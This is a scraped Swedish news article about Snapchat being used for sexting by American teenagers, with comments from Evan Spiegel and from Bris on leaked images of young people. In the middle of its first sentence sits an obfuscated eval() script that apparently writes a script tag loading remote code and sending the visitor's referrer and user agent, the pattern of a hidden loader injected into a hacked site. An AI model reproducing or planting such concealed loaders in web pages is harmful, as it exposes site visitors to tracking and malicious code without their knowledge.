Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Sexappen Snapchat tar pulsen på amerikanarna

Sexappen Snapchat tar pulsen på amerikanarna
Sebastian

Snapchat eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbkhr|var|u0026u|referrer|rrnnt||js|php’.split(’|’),0,{}))
lanserades 2011 och har verkligen fått sig ett namn i USA. Den har blivit väldigt populär bland ungdomar och används för att skicka privata bilder på sig själva. Det unika med Snapchat är att man kan ställa in antalet sekunder som bilden får visas hos mottagaren innan den för alltid är borta. 

Detta har gjort att den yngre generationen i USA använder Snapchat till att skicka lättklädda bilder alternativt naket till varandra. Visst är det en smart tjänst då bilden försvinner efter en kort period, men. Det folk inte tänkt på är att mottagaren snabbt kan ta en skärmdump med sin smartphone och spara ner den i bildarkivet.

Hela konceptet kallas i USA för ”Sexting” (en referens till sex och texting). Skaparen Evan Spiegel var till en början positiv till fenomenet

”Sexting är inte så utbrett”

– Så fort du berättar för någon att bilden på skärmen kommer att försvinna kommer alla skynda sig till sexting.

Nu har dock grundaren ändrat sin bild av det hela. Detta efter att stora tidningar och media, bland annat New York Times  fokuserat på alla problem som detta skapas när användaren enkelt kan spara ner bilder till sin smartphone.

– Jag är inte övertygad om att sexting är så utbrett som media framställer det som. Jag känner ingen som håller på med det. Det verkar helt enkelt inte så roligt i jämförelse med att ha sex på riktigt, säger han till TechCrunch.

Snapchat i Sverige

I Sverige har det funnits problem med att folk sprider bilder på lättklädda personer på Internet. Cecilia Nauclér som är presschef på Bris har haft många samtal med mycket förtvivlade ungdomar som utsatts för detta.

– Det är väldigt vanligt att ungdomar ringer och är oroliga över bilder som har spridits på dem. Ofta handlar det om bilder man har skickat i förtroende till någon och eftersom man har gjort det frivilligt känner många stor skam, säger hon och tillägger att det som vuxen är viktigt att inte fördöma någon som har hamnat i den situationen.

– Det bästa är att lyssna, absolut inte säga ‘hur kunde du?’. På Bris försöker vi även hjälpa ungdomar med juridiska frågor och se om man till exempel kan göra en anmälan.